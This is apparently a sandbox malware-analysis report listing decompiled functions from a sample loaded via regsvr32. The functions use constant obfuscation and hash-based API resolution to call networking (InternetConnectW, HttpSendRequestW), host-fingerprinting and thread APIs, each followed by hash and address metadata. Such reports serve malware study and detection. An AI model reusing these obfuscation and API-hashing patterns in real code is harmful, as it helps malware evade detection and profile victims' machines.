                                                                                                                Function 00248D7E Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 43%
                                                                                                                			E00248D7E(void* __ecx, void* __edx, signed int _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, intOrPtr _a36, intOrPtr _a40, void* _a44, intOrPtr _a48, long _a52) {
				unsigned int _v8;
				signed int _v12;
				void* _t48;
				signed int _t50;
				short _t59;

				_push(_a52);
				_t59 = _a4;
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_t59 & 0x0000ffff);
				E0024C98A(_t59 & 0x0000ffff);
				_v12 = 0xd2122c;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x122deedf;
				_v8 = 0x7b7f1e;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x0006052b;
				_a4 = 0x98292d;
				_t50 = 0x66;
				_a4 = _a4 / _t50;
				_a4 = _a4 + 0xb264;
				_a4 = _a4 ^ 0x000e6cb3;
				E00247F78(_t50, 0x2da3a2fe, _t50, 0xb6, _t50, 0x1be04906);
				_t48 = InternetConnectW(_a44, _a12, _t59, 0, 0, _a52, 0, 0); // executed
				return _t48;
			}








                                                                                                                0x00248d85
                                                                                                                0x00248d88
                                                                                                                0x00248d8d
                                                                                                                0x00248d93
                                                                                                                0x00248d96
                                                                                                                0x00248d99
                                                                                                                0x00248d9c
                                                                                                                0x00248d9d
                                                                                                                0x00248d9e
                                                                                                                0x00248d9f
                                                                                                                0x00248da0
                                                                                                                0x00248da3
                                                                                                                0x00248da6
                                                                                                                0x00248da9
                                                                                                                0x00248dac
                                                                                                                0x00248db1
                                                                                                                0x00248dbb
                                                                                                                0x00248dc1
                                                                                                                0x00248dc8
                                                                                                                0x00248dcf
                                                                                                                0x00248dd3
                                                                                                                0x00248dda
                                                                                                                0x00248de6
                                                                                                                0x00248dee
                                                                                                                0x00248dfc
                                                                                                                0x00248e03
                                                                                                                0x00248e1a
                                                                                                                0x00248e30
                                                                                                                0x00248e37

                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000), ref: 00248E30
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ConnectInternet
                                                                                                                • String ID:
                                                                                                                • API String ID: 3050416762-0
                                                                                                                • Opcode ID: e0d9d98b93de7f7e4fb9637a38f7f4dd4b562b5cb5810bcbc41addd9e23cc2e4
                                                                                                                • Instruction ID: b48d31c57ae4c16a2877a42bd048bfa3591c5da4d89a852902e9bb6de3c1f825
                                                                                                                • Opcode Fuzzy Hash: e0d9d98b93de7f7e4fb9637a38f7f4dd4b562b5cb5810bcbc41addd9e23cc2e4
                                                                                                                • Instruction Fuzzy Hash: A7211372500248BFDF259F96CC49CDF3FBAEB85750F508048F9085A210D3B29AA0DBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0025660B Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 41%
                                                                                                                			E0025660B(void* __ecx, intOrPtr _a4, DWORD* _a8, WCHAR* _a12, intOrPtr _a16, intOrPtr _a28, intOrPtr _a32, intOrPtr _a44, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t37;
				int _t44;

				_push(0);
				_push(_a48);
				_push(_a44);
				_push(0);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E0024C98A(_t37);
				_v12 = 0x7ec57e;
				_v12 = _v12 >> 3;
				_v12 = _v12 * 0x2c;
				_v12 = _v12 | 0x8e944971;
				_v12 = _v12 ^ 0x8eb1fb2a;
				_v8 = 0x400445;
				_v8 = _v8 | 0xf6942acb;
				_v8 = _v8 + 0xffff66f5;
				_v8 = _v8 + 0xc505;
				_v8 = _v8 ^ 0xf6dddebf;
				_v16 = 0xb4df02;
				_v16 = _v16 | 0x9b23471b;
				_v16 = _v16 ^ 0x9bb88961;
				E00247F78(__ecx, 0xbd3f148a, __ecx, 0x19b, __ecx, 0xdb130bf3);
				_t44 = GetVolumeInformationW(_a12, 0, 0, _a8, 0, 0, 0, 0); // executed
				return _t44;
			}








                                                                                                                0x00256614
                                                                                                                0x00256615
                                                                                                                0x00256618
                                                                                                                0x0025661b
                                                                                                                0x0025661c
                                                                                                                0x0025661d
                                                                                                                0x00256620
                                                                                                                0x00256623
                                                                                                                0x00256624
                                                                                                                0x00256625
                                                                                                                0x00256628
                                                                                                                0x0025662b
                                                                                                                0x0025662e
                                                                                                                0x00256631
                                                                                                                0x00256632
                                                                                                                0x00256633
                                                                                                                0x00256638
                                                                                                                0x00256642
                                                                                                                0x0025665a
                                                                                                                0x0025665d
                                                                                                                0x00256664
                                                                                                                0x0025666b
                                                                                                                0x00256672
                                                                                                                0x00256679
                                                                                                                0x00256680
                                                                                                                0x00256687
                                                                                                                0x0025668e
                                                                                                                0x00256695
                                                                                                                0x0025669c
                                                                                                                0x002566ad
                                                                                                                0x002566c1
                                                                                                                0x002566c7

                                                                                                                APIs
                                                                                                                • GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,9BB88961,00000000,00000000,00000000,00000000), ref: 002566C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InformationVolume
                                                                                                                • String ID:
                                                                                                                • API String ID: 2039140958-0
                                                                                                                • Opcode ID: d2215fb55f35b44b42a2f1637041b806ed3b48c34490f52af52fad1fca9b8d85
                                                                                                                • Instruction ID: a0550c4838eb5cc6c8de35d1a8790b980d68e3601e3dbabd697c429417d57131
                                                                                                                • Opcode Fuzzy Hash: d2215fb55f35b44b42a2f1637041b806ed3b48c34490f52af52fad1fca9b8d85
                                                                                                                • Instruction Fuzzy Hash: A911D676802218BBCF259FA1DD4ACCFBF79EF05364F108188F91966160D3729A65DFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00250231 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 55%
                                                                                                                			E00250231(void* __ecx, intOrPtr _a4, _Unknown_base(*)()* _a12, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t30;
				void* _t37;
				void* _t41;

				_push(_a32);
				_t41 = __ecx;
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E0024C98A(_t30);
				_v28 = 0x2596c2;
				_v24 = 0;
				_v20 = 0;
				_v8 = 0x22d05a;
				_v8 = _v8 << 4;
				_v8 = _v8 + 0x62c6;
				_v8 = _v8 ^ 0x02256f7e;
				_v16 = 0x48319a;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x241be9eb;
				_v12 = 0x1eaef8;
				_v12 = _v12 * 0x46;
				_v12 = _v12 ^ 0x0865d673;
				E00247F78(__ecx, 0xbd3f148a, __ecx, 0x144, __ecx, 0x23817b4e);
				_t37 = CreateThread(0, 0, _a12, _t41, 0, 0); // executed
				return _t37;
			}












                                                                                                                0x00250239
                                                                                                                0x0025023e
                                                                                                                0x00250240
                                                                                                                0x00250243
                                                                                                                0x00250246
                                                                                                                0x00250247
                                                                                                                0x00250248
                                                                                                                0x0025024b
                                                                                                                0x0025024c
                                                                                                                0x0025024f
                                                                                                                0x00250250
                                                                                                                0x00250251
                                                                                                                0x00250256
                                                                                                                0x00250260
                                                                                                                0x00250268
                                                                                                                0x0025026b
                                                                                                                0x00250272
                                                                                                                0x00250276
                                                                                                                0x0025027d
                                                                                                                0x00250284
                                                                                                                0x0025028b
                                                                                                                0x0025028f
                                                                                                                0x00250296
                                                                                                                0x002502ad
                                                                                                                0x002502b0
                                                                                                                0x002502c0
                                                                                                                0x002502d0
                                                                                                                0x002502d7

                                                                                                                APIs
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,F7F93CBA,2B51E95D,00000000,00000000), ref: 002502D0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2422867632-0
                                                                                                                • Opcode ID: febb2ce9b64f113a162a702ad8056895185b9551f67a8038cf5dff4911d7ecf9
                                                                                                                • Instruction ID: 3abb49911e8a675b640ccce278aae87c6b8f1736d0fe869e9d74905567255f97
                                                                                                                • Opcode Fuzzy Hash: febb2ce9b64f113a162a702ad8056895185b9551f67a8038cf5dff4911d7ecf9
                                                                                                                • Instruction Fuzzy Hash: 331155B1C01248BB8B15DF9ACD49C9FBFB8EF85704F108089F81462220C3B14B28CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00243129 Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 62%
                                                                                                                			E00243129(void* __ecx, void* __edx, long _a8, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t36;
				int _t42;
				void* _t46;
				void* _t47;

				_push(_a28);
				_t46 = __edx;
				_t47 = __ecx;
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0xffffffff);
				_push(__edx);
				_push(__ecx);
				E0024C98A(_t36);
				_v20 = _v20 & 0x00000000;
				_v32 = 0xfcf8f0;
				_v28 = 0xa842d3;
				_v24 = 0x92bf57;
				_v16 = 0x769510;
				_v16 = _v16 | 0x065b578e;
				_v16 = _v16 ^ 0x0674ffbb;
				_v12 = 0x9cdd07;
				_v12 = _v12 ^ 0xe2ef1acf;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x0e201782;
				_v8 = 0xcfed52;
				_v8 = _v8 + 0x9fc7;
				_v8 = _v8 ^ 0xd0525774;
				_v8 = _v8 ^ 0xd08905a6;
				E00247F78(__ecx, 0x2da3a2fe, __ecx, 0xca, __ecx, 0x4b0b20d0);
				_t42 = HttpSendRequestW(_t46, _a16, 0xffffffff, _t47, _a8); // executed
				return _t42;
			}














                                                                                                                0x00243131
                                                                                                                0x00243134
                                                                                                                0x00243136
                                                                                                                0x00243138
                                                                                                                0x0024313b
                                                                                                                0x0024313e
                                                                                                                0x00243141
                                                                                                                0x00243144
                                                                                                                0x00243147
                                                                                                                0x00243149
                                                                                                                0x0024314a
                                                                                                                0x0024314b
                                                                                                                0x00243150
                                                                                                                0x00243157
                                                                                                                0x00243163
                                                                                                                0x0024316a
                                                                                                                0x00243171
                                                                                                                0x00243178
                                                                                                                0x0024317f
                                                                                                                0x00243186
                                                                                                                0x0024318d
                                                                                                                0x00243194
                                                                                                                0x00243198
                                                                                                                0x0024319f
                                                                                                                0x002431a6
                                                                                                                0x002431ad
                                                                                                                0x002431b4
                                                                                                                0x002431d0
                                                                                                                0x002431e2
                                                                                                                0x002431e9

                                                                                                                APIs
                                                                                                                • HttpSendRequestW.WININET(?,0092BF57,000000FF,?,0674FFBB), ref: 002431E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: HttpRequestSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 360639707-0
                                                                                                                • Opcode ID: bfd086e1c35cf3ab1ccafcfe5f21c18e7a5a2bf4b624eaa4f09f98e4cb5a84df
                                                                                                                • Instruction ID: e61142729b53d83bda458836a77ef930da71b7d518d43c6ec3bdbc54224e36a6
                                                                                                                • Opcode Fuzzy Hash: bfd086e1c35cf3ab1ccafcfe5f21c18e7a5a2bf4b624eaa4f09f98e4cb5a84df
                                                                                                                • Instruction Fuzzy Hash: 31116771C0520CBBCF059FA4880A9DEBFB1EF44324F208298F925662A1D3758A24DF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00243466 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00243466(void* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t29;
				intOrPtr* _t35;
				void* _t36;
				void* _t41;

				_t41 = __ecx;
				E0024C98A(_t29);
				_v8 = 0x88f6ec;
				_v8 = _v8 | 0x6177bf25;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 + 0x167f;
				_v8 = _v8 ^ 0x0004f919;
				_v16 = 0x9ca171;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x0005b7ae;
				_v12 = 0xf5b080;
				_v12 = _v12 * 0x58;
				_v12 = _v12 ^ 0x54793a02;
				_t35 = E00247F78(__ecx, 0xffc5979d, __ecx, 0xcc, __ecx, 0x31e1b46b);
				_t36 =  *_t35(0, _t41, 0, 0, _a12, __ecx, __edx, 0, 0, _a12, _a16, 0, _a24, _a28, _a32); // executed
				return _t36;
			}










                                                                                                                0x00243473
                                                                                                                0x00243486
                                                                                                                0x0024348b
                                                                                                                0x00243495
                                                                                                                0x002434a1
                                                                                                                0x002434a5
                                                                                                                0x002434ac
                                                                                                                0x002434b3
                                                                                                                0x002434ba
                                                                                                                0x002434be
                                                                                                                0x002434c5
                                                                                                                0x002434dc
                                                                                                                0x002434df
                                                                                                                0x002434ef
                                                                                                                0x002434fe
                                                                                                                0x00243505

                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 002434FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: 13f768f001924c624068fd7892d91b4b7d53848237674a523edb96abd7f13e84
                                                                                                                • Instruction ID: b4418204eb179a3867fc00cf27fe79142436937f0d49a5600408e3cdb9a84c9d
                                                                                                                • Opcode Fuzzy Hash: 13f768f001924c624068fd7892d91b4b7d53848237674a523edb96abd7f13e84
                                                                                                                • Instruction Fuzzy Hash: 56113671805248BBCB15DFA6DD0ACAFBFB8EB85704F108098F914A2210D3714B24DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0025EE14 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0025EE14(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t36;
				intOrPtr* _t44;
				void* _t45;
				signed int _t47;
				void* _t52;

				_t52 = __ecx;
				E0024C98A(_t36);
				_v20 = _v20 & 0x00000000;
				_v28 = 0x925fd5;
				_v24 = 0x3b904c;
				_v16 = 0x6d30de;
				_t47 = 0x5b;
				_v16 = _v16 * 0x60;
				_v16 = _v16 ^ 0x28ff8dcb;
				_v12 = 0xbfa3c2;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x00027e76;
				_v8 = 0xee0b6c;
				_v8 = _v8 + 0xffffa39f;
				_v8 = _v8 + 0xffff7139;
				_v8 = _v8 / _t47;
				_v8 = _v8 ^ 0x000127e6;
				_t44 = E00247F78(_t47, 0xbd3f148a, _t47, 0xa8, _t47, 0xf59140c4);
				_t45 =  *_t44(_a8, _t52, __ecx, __edx, _a4, _a8, _a12, _a16); // executed
				return _t45;
			}














                                                                                                                0x0025ee1e
                                                                                                                0x0025ee2b
                                                                                                                0x0025ee30
                                                                                                                0x0025ee37
                                                                                                                0x0025ee40
                                                                                                                0x0025ee47
                                                                                                                0x0025ee54
                                                                                                                0x0025ee5b
                                                                                                                0x0025ee5e
                                                                                                                0x0025ee65
                                                                                                                0x0025ee6c
                                                                                                                0x0025ee70
                                                                                                                0x0025ee77
                                                                                                                0x0025ee7e
                                                                                                                0x0025ee85
                                                                                                                0x0025ee96
                                                                                                                0x0025ee9e
                                                                                                                0x0025eeaf
                                                                                                                0x0025eebb
                                                                                                                0x0025eec1

                                                                                                                APIs
                                                                                                                • ProcessIdToSessionId.KERNEL32(28FF8DCB,00000000,?,?,?,?,?,?,?,?,?,030CEBA0), ref: 0025EEBB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ProcessSession
                                                                                                                • String ID:
                                                                                                                • API String ID: 3779259828-0
                                                                                                                • Opcode ID: f62aea174aed0786bad1caf595a948cb0f869b04c5dc3c446b3cefd37749493c
                                                                                                                • Instruction ID: 4b1031d002c60d154d4389a181b2c18e947627bb995bc615993e5227f48361dd
                                                                                                                • Opcode Fuzzy Hash: f62aea174aed0786bad1caf595a948cb0f869b04c5dc3c446b3cefd37749493c
                                                                                                                • Instruction Fuzzy Hash: 261158B6D0521CFBCF04DFA9D906ADEBBB1EF44314F208198E91466250E3B15F149F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00243506 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E00243506(void* __ecx, void* __edx, void* _a4, long _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t39;
				void* _t47;
				signed int _t49;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0024C98A(_t39);
				_v16 = 0xf4e2fc;
				_t49 = 0x3b;
				_v16 = _v16 / _t49;
				_v16 = _v16 ^ 0x00083f87;
				_v12 = 0x549d10;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0xffff8515;
				_v12 = _v12 | 0x9f85c2ad;
				_v12 = _v12 ^ 0x9fa0e66d;
				_v8 = 0xbeaf63;
				_v8 = _v8 | 0x7acbe5f7;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x3b62dfe8;
				_v8 = _v8 ^ 0xcc9b72fd;
				E00247F78(_t49, 0xbd3f148a, _t49, 0x106, _t49, 0xba07f621);
				_t47 = RtlAllocateHeap(_a4, _a16, _a8); // executed
				return _t47;
			}









                                                                                                                0x0024350c
                                                                                                                0x0024350f
                                                                                                                0x00243512
                                                                                                                0x00243515
                                                                                                                0x00243518
                                                                                                                0x0024351d
                                                                                                                0x00243522
                                                                                                                0x00243533
                                                                                                                0x0024353b
                                                                                                                0x00243543
                                                                                                                0x0024354a
                                                                                                                0x00243551
                                                                                                                0x00243555
                                                                                                                0x0024355c
                                                                                                                0x00243563
                                                                                                                0x0024356a
                                                                                                                0x00243571
                                                                                                                0x00243578
                                                                                                                0x0024357c
                                                                                                                0x00243583
                                                                                                                0x0024359a
                                                                                                                0x002435ab
                                                                                                                0x002435b0

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(9FA0E66D,?,00083F87), ref: 002435AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 0119f98a9aecafce541f1f720687f33deaabc5244ab0f41ad62cf211dd8c1e68
                                                                                                                • Instruction ID: 857c91be4f7c72cfc49f8aaaebe148a0f78615288c4f13e915f1767d6e3c26b0
                                                                                                                • Opcode Fuzzy Hash: 0119f98a9aecafce541f1f720687f33deaabc5244ab0f41ad62cf211dd8c1e68
                                                                                                                • Instruction Fuzzy Hash: C31125B1D01208BFCF04EFA4D84689EBFB5EB44700F208098F9146A221D3728B24EF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00243DFB Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00243DFB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, DWORD* _a12, CHAR* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t29;
				int _t37;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0024C98A(_t29);
				_v32 = 0x7ac1d8;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v16 = 0x40a286;
				_v16 = _v16 * 0x73;
				_v16 = _v16 ^ 0x1d0db636;
				_v12 = 0xfb0e59;
				_v12 = _v12 + 0xbc70;
				_v12 = _v12 ^ 0x00f78533;
				_v8 = 0x340737;
				_v8 = _v8 ^ 0x54cf0156;
				_v8 = _v8 + 0xffff4307;
				_v8 = _v8 ^ 0x54fc9b2f;
				E00247F78(__ecx, 0xbd3f148a, __ecx, 0x3d, __ecx, 0xd5ddfd8d);
				_t37 = GetComputerNameA(_a16, _a12); // executed
				return _t37;
			}










                                                                                                                0x00243e02
                                                                                                                0x00243e05
                                                                                                                0x00243e08
                                                                                                                0x00243e0b
                                                                                                                0x00243e0f
                                                                                                                0x00243e10
                                                                                                                0x00243e15
                                                                                                                0x00243e24
                                                                                                                0x00243e2f
                                                                                                                0x00243e34
                                                                                                                0x00243e35
                                                                                                                0x00243e40
                                                                                                                0x00243e43
                                                                                                                0x00243e4a
                                                                                                                0x00243e51
                                                                                                                0x00243e58
                                                                                                                0x00243e5f
                                                                                                                0x00243e66
                                                                                                                0x00243e6d
                                                                                                                0x00243e74
                                                                                                                0x00243e84
                                                                                                                0x00243e92
                                                                                                                0x00243e98

                                                                                                                APIs
                                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 00243E92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ComputerName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3545744682-0
                                                                                                                • Opcode ID: dc62e1b9005d36cff1b3bafdb194b3dec13264f46844aa8be4cea2cf46798933
                                                                                                                • Instruction ID: 353eca307957aeb931031b996971886bc4e36330228a67a3ea3168f95be8ab5c
                                                                                                                • Opcode Fuzzy Hash: dc62e1b9005d36cff1b3bafdb194b3dec13264f46844aa8be4cea2cf46798933
                                                                                                                • Instruction Fuzzy Hash: 46115371C00209BBDF05DFA9C90699EBBB5EF44300F508198E91066261D7B69B269F92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0024D3BF Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0024D3BF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t35;
				intOrPtr* _t41;
				void* _t42;

				E0024C98A(_t35);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v32 = 0x156f1f;
				_v28 = 0xac465b;
				_v12 = 0x5a9f31;
				_v12 = _v12 | 0x782d82f5;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x1e1a9599;
				_v8 = 0xcf181a;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0xdde24463;
				_v8 = _v8 * 0x49;
				_v8 = _v8 ^ 0x16d27299;
				_v16 = 0xacb41;
				_v16 = _v16 + 0xffff744f;
				_v16 = _v16 ^ 0x000a26d4;
				_t41 = E00247F78(__ecx, 0xbd3f148a, __ecx, 0x1ed, __ecx, 0xf764b4c2);
				_t42 =  *_t41(_a8, __ecx, __edx, _a4, _a8, _a12); // executed
				return _t42;
			}













                                                                                                                0x0024d3d0
                                                                                                                0x0024d3d5
                                                                                                                0x0024d3dc
                                                                                                                0x0024d3e5
                                                                                                                0x0024d3ec
                                                                                                                0x0024d3f3
                                                                                                                0x0024d3fa
                                                                                                                0x0024d401
                                                                                                                0x0024d405
                                                                                                                0x0024d40c
                                                                                                                0x0024d413
                                                                                                                0x0024d417
                                                                                                                0x0024d42e
                                                                                                                0x0024d431
                                                                                                                0x0024d438
                                                                                                                0x0024d43f
                                                                                                                0x0024d446
                                                                                                                0x0024d456
                                                                                                                0x0024d461
                                                                                                                0x0024d466

                                                                                                                APIs
                                                                                                                • GetNativeSystemInfo.KERNEL32(000A26D4), ref: 0024D461
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InfoNativeSystem
